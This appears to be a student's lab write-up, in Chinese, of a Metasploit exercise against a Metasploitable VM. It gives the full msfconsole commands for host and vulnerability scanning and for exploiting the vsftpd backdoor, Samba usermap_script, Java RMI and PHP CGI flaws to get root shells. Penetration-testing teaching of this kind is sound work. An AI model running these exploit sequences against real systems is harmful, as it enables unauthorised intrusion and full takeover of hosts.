1.实验内容
掌握Metasploit的基础操作:模块搜索(search)、加载(use)、参数配置(set)、攻击执行(exploit/run)及会话管理(sessions)。
理解4类漏洞的核心原理,明确漏洞与靶机开放端口、服务的对应关系。
能够通过命令行验证攻击结果,确认是否成功获取靶机操作权限。
2.实验过程
2.1前期渗透
ifconfig得到metasploitable靶机的ip地址为192.168.81.166 。
在kali中打开msfconsole,输入以下命令。
search arp_sweep
use 0
set RHOSTS 192.168.81.0/24
run
扫描靶机。
可以在命令行中输入nmap -p 1-2048 192.168.81.166查看靶机开放的端口。
接着在命令行中输入nmap -script=vuln 192.168.81.166对靶机的漏洞进行扫描.。
2.2Vsftpd源码包后门漏洞(21端口)
在msfconsole中输入以下命令。
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.81.166
run
再输入shell相关命令,可以看到已经成功获取靶机的shell。
2.3SambaMS-RPC Shell命令注入漏洞(端口139)
在msfconsole中输入以下命令。
use exploit/multi/samba/usermap_script
set RHOST 192.168.81.166
exploit
再输入uname -a命令,可以看到已经成功获取靶机的shell.
2.4Java RMI SERVER命令执行漏洞
之前已经扫描过1099端口并确定其存在漏洞且开放,在msfconsole中输入以下命令。
use exploit/multi/misc/java_rmi_server
set RHOST 192.168.81.166
exploit
shell
输入命令whoami,得到结果root,说明攻击成功。
2.5PHP CGI参数执行注入漏洞
在msfconsole中输入以下命令。
use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.81.166
exploit
shell
可以执行ls命令,攻击成功。
3.问题及解决方案
问题1:在一开始扫描靶机时,显示“不允许的操作”,扫描失败。
问题解决1:使用sudo su - 命令切换至root权限,成功解决。
4.学习感悟、思考等
通过本次Metasploit实践,我从前期的主机发现、端口扫描等信息搜集,到依次利用Vsftpd、Samba 等4类漏洞完成渗透,清晰掌握了MSF的模块加载、参数配置、攻击执行等核心操作。整个过程让我直观理解了漏洞原理与实际利用的关联,对渗透测试流程有了更具象的认知。